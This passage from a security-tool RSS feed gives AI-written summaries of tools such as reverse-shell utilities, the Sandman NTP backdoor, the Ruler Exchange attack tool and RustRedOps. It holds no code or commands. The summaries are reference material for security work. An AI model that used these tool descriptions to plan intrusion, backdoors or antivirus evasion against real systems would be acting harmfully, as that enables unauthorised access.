&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Retoolkit is a comprehensive suite designed for reverse engineering and malware analysis on x86 and x64 Windows systems, providing users with an easy setup of essential tools. Notable features include a pre-configured environment for popular applications such as x64dbg, streamlined access via desktop shortcuts or context menus, and support for command-line operations from any directory. This toolkit is particularly advantageous for quickly establishing a new analysis virtual machine.&lt;/p&gt;</description></item><item><title>retrowrite</title><link>https://rainmana.github.io/hackyfeed/tools/hexhive-retrowrite/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hexhive-retrowrite/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Retrowrite is a static binary rewriter designed for x64 and aarch64 architectures, enabling the insertion of instrumentation into binaries without the need for source code, thereby supporting use cases in fuzzing and sanitization. The tool employs the symbolization technique to ensure zero overhead during binary rewriting and includes features such as AFL-coverage and ASan instrumentation, along with a variant (KRetrowrite) specifically for rewriting Linux kernel modules. Different algorithms and supported features are available for the x64 and arm64 versions, accommodating various binary types and compiler specifications.&lt;/p&gt;</description></item><item><title>revanced-patcher</title><link>https://rainmana.github.io/hackyfeed/tools/revanced-revanced-patcher/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/revanced-revanced-patcher/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ReVanced Patcher is a comprehensive library designed for patching Android applications, facilitating the modification of Dalvik VM bytecode and APK resources. It serves as the foundational component for other ReVanced tools such as ReVanced Manager and ReVanced CLI, enabling users to create customized patches through an extensive patch repository. Notable features include the ability to disassemble and reassemble Dalvik bytecode, along with resource decoding capabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;picture&gt;
 &lt;source
 width="256px"
 media="(prefers-color-scheme: dark)"
 srcset="assets/revanced-headline/revanced-headline-vertical-dark.svg"
 &gt;
 &lt;img 
 width="256px"
 src="assets/revanced-headline/revanced-headline-vertical-light.svg"
 &gt;
 &lt;/picture&gt;
 &lt;br&gt;
 &lt;a href="https://revanced.app/"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="assets/revanced-logo/revanced-logo.svg" /&gt;
 &lt;img height="24px" src="assets/revanced-logo/revanced-logo.svg" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://github.com/ReVanced"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://i.ibb.co/dMMmCrW/Git-Hub-Mark.png" /&gt;
 &lt;img height="24px" src="https://i.ibb.co/9wV3HGF/Git-Hub-Mark-Light.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="http://revanced.app/discord"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/13122796/178032563-d4e084b7-244e-4358-af50-26bde6dd4996.png" /&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/13122796/178032563-d4e084b7-244e-4358-af50-26bde6dd4996.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://reddit.com/r/revancedapp"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/13122796/178032351-9d9d5619-8ef7-470a-9eec-2744ece54553.png" /&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/13122796/178032351-9d9d5619-8ef7-470a-9eec-2744ece54553.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://t.me/app_revanced"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/13122796/178032213-faf25ab8-0bc3-4a94-a730-b524c96df124.png" /&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/13122796/178032213-faf25ab8-0bc3-4a94-a730-b524c96df124.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://x.com/revancedapp"&gt;
 &lt;picture&gt;
 &lt;source media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/93124920/270180600-7c1b38bf-889b-4d68-bd5e-b9d86f91421a.png"&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/93124920/270108715-d80743fa-b330-4809-b1e6-79fbdc60d09c.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://www.youtube.com/@ReVanced"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/13122796/178032714-c51c7492-0666-44ac-99c2-f003a695ab50.png" /&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/13122796/178032714-c51c7492-0666-44ac-99c2-f003a695ab50.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 Continuing the legacy of Vanced
&lt;/p&gt;</description></item><item><title>revanced-patches-template</title><link>https://rainmana.github.io/hackyfeed/tools/revanced-revanced-patches-template/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/revanced-revanced-patches-template/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ReVanced Patches Template is a foundational repository designed to facilitate the creation of new ReVanced Patches repositories. Its primary use case is to allow developers to implement and share multiple patches to modify existing applications effectively, leveraging patches from various sources. Notable features include a configurable build setup and collaborative capabilities that enable integration of diverse patches.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;picture&gt;
 &lt;source
 width="256px"
 media="(prefers-color-scheme: dark)"
 srcset="assets/revanced-headline/revanced-headline-vertical-dark.svg"
 &gt;
 &lt;img 
 width="256px"
 src="assets/revanced-headline/revanced-headline-vertical-light.svg"
 &gt;
 &lt;/picture&gt;
 &lt;br&gt;
 &lt;a href="https://revanced.app/"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="assets/revanced-logo/revanced-logo.svg" /&gt;
 &lt;img height="24px" src="assets/revanced-logo/revanced-logo.svg" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://github.com/ReVanced"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://i.ibb.co/dMMmCrW/Git-Hub-Mark.png" /&gt;
 &lt;img height="24px" src="https://i.ibb.co/9wV3HGF/Git-Hub-Mark-Light.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="http://revanced.app/discord"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/13122796/178032563-d4e084b7-244e-4358-af50-26bde6dd4996.png" /&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/13122796/178032563-d4e084b7-244e-4358-af50-26bde6dd4996.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://reddit.com/r/revancedapp"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/13122796/178032351-9d9d5619-8ef7-470a-9eec-2744ece54553.png" /&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/13122796/178032351-9d9d5619-8ef7-470a-9eec-2744ece54553.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://t.me/app_revanced"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/13122796/178032213-faf25ab8-0bc3-4a94-a730-b524c96df124.png" /&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/13122796/178032213-faf25ab8-0bc3-4a94-a730-b524c96df124.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://x.com/revancedapp"&gt;
 &lt;picture&gt;
 &lt;source media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/93124920/270180600-7c1b38bf-889b-4d68-bd5e-b9d86f91421a.png"&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/93124920/270108715-d80743fa-b330-4809-b1e6-79fbdc60d09c.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="https://www.youtube.com/@ReVanced"&gt;
 &lt;picture&gt;
 &lt;source height="24px" media="(prefers-color-scheme: dark)" srcset="https://user-images.githubusercontent.com/13122796/178032714-c51c7492-0666-44ac-99c2-f003a695ab50.png" /&gt;
 &lt;img height="24px" src="https://user-images.githubusercontent.com/13122796/178032714-c51c7492-0666-44ac-99c2-f003a695ab50.png" /&gt;
 &lt;/picture&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 Continuing the legacy of Vanced
&lt;/p&gt;</description></item><item><title>reverse_ssh</title><link>https://rainmana.github.io/hackyfeed/tools/nhas-reverse_ssh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nhas-reverse_ssh/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Reverse SSH is a tool designed for establishing reverse shells using SSH, enabling secure connections for remote management and file transfer. Its primary use case revolves around providing a reliable method for accessing and controlling remote systems, featuring capabilities such as dynamic port forwarding, native SCP/SFTP support, and multiple network transports like HTTP and TLS. Notable features include mutual client-server authentication, a full Windows shell experience, and advanced functionalities like fileless execution and built-in HTTP server capabilities for dynamic client generation.&lt;/p&gt;</description></item><item><title>reverse-linear-sync-engine</title><link>https://rainmana.github.io/hackyfeed/tools/wzhudev-reverse-linear-sync-engine/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wzhudev-reverse-linear-sync-engine/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Reverse Engineering Linear&amp;rsquo;s Sync Engine&amp;rdquo; project provides an in-depth analysis of Linear&amp;rsquo;s Sync Engine (LSE), aimed at enhancing collaborative software applications through an intuitive and efficient synchronization solution. Its primary use case is to support real-time collaboration by managing edits while offering critical features like partial syncing, permission controls, and offline availability, all wrapped in a developer-friendly API. The project emphasizes the balance of complexity and usability, highlighting LSE&amp;rsquo;s adaptability for various data models without requiring extensive expertise in sync technologies.&lt;/p&gt;</description></item><item><title>reverse-shell</title><link>https://rainmana.github.io/hackyfeed/tools/lukechilds-reverse-shell/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lukechilds-reverse-shell/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; reverse-shell is a tool that facilitates setting up reverse shells on Unix-like systems, primarily intended for penetration testing and educational purposes. It automatically detects the target&amp;rsquo;s available software to execute the appropriate payload, enabling users to bypass firewalls and gain remote shell access effortlessly. Notable features include ease of use with commands for listening and executing reverse shells, options for reconnecting after disconnection, and the ability to run in the background to avoid detection.&lt;/p&gt;</description></item><item><title>reverse-ssh</title><link>https://rainmana.github.io/hackyfeed/tools/fahrj-reverse-ssh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fahrj-reverse-ssh/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ReverseSSH is a lightweight, statically-linked SSH server designed for establishing reverse connections, primarily useful for remote access during CTFs and penetration tests like the OSCP exam. It offers fully interactive shell access, file transfer through SFTP, and supports various port forwarding options, making it a versatile tool for bridging initial access with privilege escalation on target systems running Unix or Windows. Notable features include its compact size of less than 1.5MB and compatibility with both operating systems, enhancing its utility in diverse environments.&lt;/p&gt;</description></item><item><title>ReverseAPK</title><link>https://rainmana.github.io/hackyfeed/tools/1n3-reverseapk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1n3-reverseapk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ReverseAPK is a tool designed for the analysis and reverse engineering of Android applications, enabling users to quickly decompile APK files into Java and Smali formats. Its notable features include static source code analysis to identify common vulnerabilities, automatic extraction of files, and comprehensive evaluation of the AndroidManifest.xml for security risks associated with application behavior.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://github.com/1N3/ReverseAPK/blob/master/logo.png" alt="alt tag"&gt;&lt;/p&gt;
&lt;h1 id="reverseapk"&gt;ReverseAPK&lt;/h1&gt;
&lt;p&gt;Credits: @xer0dayz&lt;/p&gt;
&lt;p&gt;Website: &lt;a href="https://sn1persecurity.com"&gt;https://sn1persecurity.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Version: 1.2&lt;/p&gt;
&lt;h2 id="about"&gt;ABOUT:&lt;/h2&gt;
&lt;p&gt;Quickly analyze and reverse engineer Android applications.&lt;/p&gt;</description></item><item><title>reversinglabs-yara-rules</title><link>https://rainmana.github.io/hackyfeed/tools/reversinglabs-reversinglabs-yara-rules/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/reversinglabs-reversinglabs-yara-rules/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The ReversingLabs YARA Rules repository provides a collection of high-quality YARA detection rules designed for threat hunters and incident responders to enhance threat detection capabilities within their environments. These rules emphasize precision and minimal false positives, utilizing clearly defined byte patterns and conditions to target unique malware functionalities. Continuous testing against a vast array of binaries ensures the rules maintain their effectiveness across various security solutions, particularly when integrated with the ReversingLabs Titanium Platform.&lt;/p&gt;</description></item><item><title>RigelEngine</title><link>https://rainmana.github.io/hackyfeed/tools/lethal-guitar-rigelengine/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lethal-guitar-rigelengine/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Rigel Engine is a modern re-implementation of the classic game Duke Nukem II, enabling it to run natively on today’s operating systems while maintaining compatibility with the original game&amp;rsquo;s data files. Its key features include widescreen support, improved graphics and performance with smooth scrolling, quick save functionality, enhanced controller support, and extended modding capabilities, all achieved through reverse engineering due to the absence of the original source code. The tool is stable and supports multiple platforms, including Windows, Linux, and macOS, with minimal system requirements.&lt;/p&gt;</description></item><item><title>RMS-Runtime-Mobile-Security</title><link>https://rainmana.github.io/hackyfeed/tools/m0bilesecurity-rms-runtime-mobile-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m0bilesecurity-rms-runtime-mobile-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Runtime Mobile Security (RMS) is a web-based interface that leverages FRIDA to facilitate real-time manipulation of Android and iOS applications. Its primary use case includes dumping loaded classes and methods, hooking functionality on-the-fly, and tracing method arguments and return values. Notable features encompass the ability to load custom scripts and comprehensive support for both Android and iOS platforms, making it a versatile tool for mobile security analysis and testing.&lt;/p&gt;</description></item><item><title>robin</title><link>https://rainmana.github.io/hackyfeed/tools/apurvsinghgautam-robin/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/apurvsinghgautam-robin/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Robin is an AI-powered OSINT tool designed for conducting investigations on the dark web, utilizing language models to enhance query refinement and result filtering from various dark web search engines. Its notable features include modular architecture for easy integration of new components, multi-model support for flexible AI interactions, a Streamlit-based web UI for user-friendly navigation, and robust reporting capabilities to save investigation outputs. It is recommended to be deployed using Docker for isolated and efficient operation.&lt;/p&gt;</description></item><item><title>ronin</title><link>https://rainmana.github.io/hackyfeed/tools/ronin-rb-ronin/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ronin-rb-ronin/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ronin is an open-source Ruby toolkit designed for security research and development, featuring a comprehensive suite of CLI commands and libraries tailored for various security tasks such as data encoding/decoding, vulnerability scanning, fuzzing, and reconnaissance. Notable features include a fully-loaded Ruby REPL, a lightweight web UI for database interaction, and the ability to install and run third-party exploits or payloads. This tool is primarily used by security researchers, bug bounty hunters, and developers for efficient data processing and rapid script prototyping.&lt;/p&gt;</description></item><item><title>RootMyTV.github.io</title><link>https://rainmana.github.io/hackyfeed/tools/rootmytv-rootmytv.github.io/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rootmytv-rootmytv.github.io/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RootMyTV is an exploit tool designed for rooting or jailbreaking LG webOS smart TVs, primarily facilitating the installation of the webOS Homebrew Channel with elevated privileges. Notable features include its user-friendly interface and detailed instructions for exploiting unpatched webOS versions, enabling users to run third-party applications on their TVs. However, due to LG&amp;rsquo;s security updates, the tool is unlikely to work on models with firmware released after mid-2022.&lt;/p&gt;</description></item><item><title>ROPgadget</title><link>https://rainmana.github.io/hackyfeed/tools/jonathansalwan-ropgadget/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jonathansalwan-ropgadget/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ROPgadget is a tool designed to facilitate Return-Oriented Programming (ROP) exploitation by allowing users to search for gadgets within binary files. It supports multiple file formats (ELF, PE, Mach-O, Raw) and architectures (x86, x64, ARM, ARM64, MIPS, PowerPC, Sparc, RISC-V 64) and employs the Capstone disassembler for efficient gadget identification. Notable features include customizable search parameters, ROP chain generation, and support for various opcode and string searching capabilities.&lt;/p&gt;</description></item><item><title>ruler</title><link>https://rainmana.github.io/hackyfeed/tools/sensepost-ruler/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sensepost-ruler/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ruler is a remote interaction tool designed for Exchange servers, exploiting MAPI/HTTP and RPC/HTTP protocols to manipulate Outlook features for shell access. Its primary use case includes enumerating valid users, creating malicious mail rules, and executing VBScript via Outlook forms or home pages. Notable features include the ability to leverage the Autodiscover service for efficient interaction and a variety of built-in functions for customized exploitation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="introduction"&gt;Introduction&lt;/h1&gt;
&lt;p&gt;Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim is abuse the client-side Outlook features and gain a shell remotely.&lt;/p&gt;</description></item><item><title>rustcat</title><link>https://rainmana.github.io/hackyfeed/tools/robiot-rustcat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/robiot-rustcat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Rustcat is a versatile port listener and reverse shell utility compatible with Linux, MacOS, and Windows, designed to simplify remote command execution. Notable features include an interactive mode with command history, tab completion, and CTRL-C blocking, which enhance user experience during shell operations. It provides two primary modes of operation: listening for incoming connections and establishing reverse shells for remote system access.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;h1&gt;rustcat - The modern port listener and reverse shell &lt;/h1&gt;
&lt;/div&gt;
&lt;p align="center"&gt;
	&lt;img alt="GitHub All Releases" src="https://img.shields.io/github/downloads/robiot/rustcat/total?label=GitHub%20Downloads" /&gt;
 	&lt;a href="https://aur.archlinux.org/packages/rustcat"&gt;&lt;img alt="AUR version" src="https://img.shields.io/aur/version/rustcat" /&gt;&lt;/a&gt;
 	&lt;img alt="GitHub Issues" src="https://img.shields.io/github/issues/robiot/rustcat.svg" /&gt;
 	&lt;img alt="GitHub Contributors" src="https://img.shields.io/github/contributors/robiot/rustcat" /&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>RustHound</title><link>https://rainmana.github.io/hackyfeed/tools/nh-red-team-rusthound/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nh-red-team-rusthound/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RustHound is a cross-platform BloodHound collector tool developed in Rust, designed to generate data about users, groups, computers, OUs, GPOs, and containers for analysis within BloodHound. It operates silently without detection by antivirus software and is suitable for environments where SharpHound is blocked or incompatible. Notable features include its ability to run on Linux, Windows, and macOS, along with a range of compile options, including Docker support and static binary generation.&lt;/p&gt;</description></item><item><title>RustRedOps</title><link>https://rainmana.github.io/hackyfeed/tools/joaoviictorti-rustredops/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/joaoviictorti-rustredops/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RustRedOps is a collection of Red Team operation tools developed in Rust, aimed at enhancing the capabilities of security professionals and penetration testers in conducting security assessments and intrusion tests. Notable features include a diverse set of projects focused on techniques such as API hooking, anti-analysis, process enumeration, and various forms of code injection, which collectively facilitate advanced exploitation tactics and malware development. The repository emphasizes efficiency and effectiveness, making it a valuable resource for practitioners in cybersecurity.&lt;/p&gt;</description></item><item><title>RustScan</title><link>https://rainmana.github.io/hackyfeed/tools/bee-san-rustscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bee-san-rustscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RustScan is an advanced port scanner designed for high-speed operation, capable of scanning all 65,000 ports in just 3 seconds. Its notable features include a flexible scripting engine that supports Python, Lua, and Shell for automated processing, as well as adaptive learning capabilities that enhance its performance over time, making it a highly effective tool for network security assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center" markdown="1"&gt;
&lt;p&gt;➡️ &lt;a href="http://discord.skerritt.blog" title="Discord blog"&gt;Discord&lt;/a&gt; | &lt;a href="https://github.com/RustScan/RustScan/wiki/Installation-Guide" title="Installation Guide Wiki"&gt;Installation Guide&lt;/a&gt; | &lt;a href="https://github.com/RustScan/RustScan#-usage"&gt;Usage Guide&lt;/a&gt; ⬅️&lt;/p&gt;</description></item><item><title>rz-ghidra</title><link>https://rainmana.github.io/hackyfeed/tools/rizinorg-rz-ghidra/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rizinorg-rz-ghidra/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; rz-ghidra is an integration of the Ghidra decompiler and Sleigh disassembler specifically designed for the Rizin framework. This plugin allows users to decompile functions, output various formats such as XML and JSON, and customize settings for decompilation in a self-contained manner without requiring the full Ghidra suite. Notable features include seamless integration with Rizin, side-by-side decompilation views, and extensive configurability through various parameters for enhanced user experience.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img width="150" height="150" align="left" style="float: left; margin: 0 10px 0 0;" alt="rz-ghidra logo" src="https://raw.githubusercontent.com/rizinorg/rz-ghidra/master/assets/logo.svg"&gt;
&lt;h1 id="rz-ghidra"&gt;rz-ghidra&lt;/h1&gt;
&lt;!--[![Build Status](https://travis-ci.com/rizinorg/rz-ghidra-dec.svg?token=JDmXp2pDhXxtPErySVHM&amp;branch=master)](https://travis-ci.com/rizinorg/rz-ghidra)--&gt;
&lt;p&gt;This is an integration of the Ghidra decompiler and Sleigh Disassembler for &lt;a href="https://github.com/rizinorg/rizin"&gt;Rizin&lt;/a&gt;.
It is solely based on the decompiler part of Ghidra, which is written entirely in
C++, so Ghidra itself is not required at all and the plugin can be built self-contained.
This project was presented, initially for radare2, at r2con 2019 as part of the Cutter talk: &lt;a href="https://youtu.be/eHtMiezr7l8?t=950"&gt;https://youtu.be/eHtMiezr7l8?t=950&lt;/a&gt;&lt;/p&gt;</description></item><item><title>saas-attacks</title><link>https://rainmana.github.io/hackyfeed/tools/pushsecurity-saas-attacks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pushsecurity-saas-attacks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The SaaS Attacks repository provides a structured collection of attack techniques tailored for Software-as-a-Service (SaaS) platforms, aimed at aiding security researchers, penetration testers, and red/blue teams. Notable features include an emphasis on &amp;ldquo;networkless&amp;rdquo; attacks devoid of traditional endpoint interactions, and a matrix inspired by the MITRE ATT&amp;amp;CK framework focusing specifically on SaaS-based threats. This resource is designed to facilitate knowledge sharing and collaboration in the identification and mitigation of SaaS vulnerabilities.&lt;/p&gt;</description></item><item><title>Sandman</title><link>https://rainmana.github.io/hackyfeed/tools/idov31-sandman/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/idov31-sandman/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sandman is a backdoor designed for use during red team engagements, specifically tailored to operate on hardened networks by leveraging the NTP protocol to retrieve and execute arbitrary shellcode from a designated server. Notable features include the ability to spoof legitimate IP addresses for NTP, execute as a standalone C# application, and the flexibility to function across various operating systems including Windows and Linux, enhancing its covert capabilities in security assessments.&lt;/p&gt;</description></item><item><title>sandmap</title><link>https://rainmana.github.io/hackyfeed/tools/trimstray-sandmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trimstray-sandmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; sandmap is a reconnaissance tool that enhances the capabilities of the Nmap engine, providing a simplified command line interface for automating and expediting network and system scanning processes. It offers 31 modules with 459 predefined scan profiles, support for the Nmap Scripting Engine (NSE), and integration with TOR for enhanced privacy during scans, allowing users to execute multiple scans simultaneously.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;sandmap&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;a href="https://travis-ci.org/trimstray/sandmap"&gt;
 &lt;img src="https://travis-ci.org/trimstray/sandmap.svg?branch=master" alt="Travis-CI"&gt;
 &lt;/a&gt;
 &lt;a href="https://img.shields.io/badge/Version-v1.2.0-lightgrey.svg"&gt;
 &lt;img src="https://img.shields.io/badge/Version-v1.2.0-lightgrey.svg" alt="Version"&gt;
 &lt;/a&gt;
 &lt;a href="https://inventory.rawsec.ml/tools.html#Sandmap"&gt;
 &lt;img src="https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg" alt="Rawsec's CyberSecurity Inventory"&gt;
 &lt;/a&gt;
 &lt;a href="https://blackarch.org/tools.html"&gt;
 &lt;img src="https://img.shields.io/badge/BlackArch-available-red.svg" alt="BlackArch Repository"&gt;
 &lt;/a&gt;
 &lt;a href="http://www.gnu.org/licenses/"&gt;
 &lt;img src="https://img.shields.io/badge/license-GNU-blue.svg" alt="License"&gt;
 &lt;/a&gt;
&lt;/p&gt;
&lt;h5 align="center"&gt;
 &lt;a href="#description"&gt;Description&lt;/a&gt;
 • &lt;a href="#how-to-use"&gt;How To Use&lt;/a&gt;
 • &lt;a href="#command-line"&gt;Command Line&lt;/a&gt;
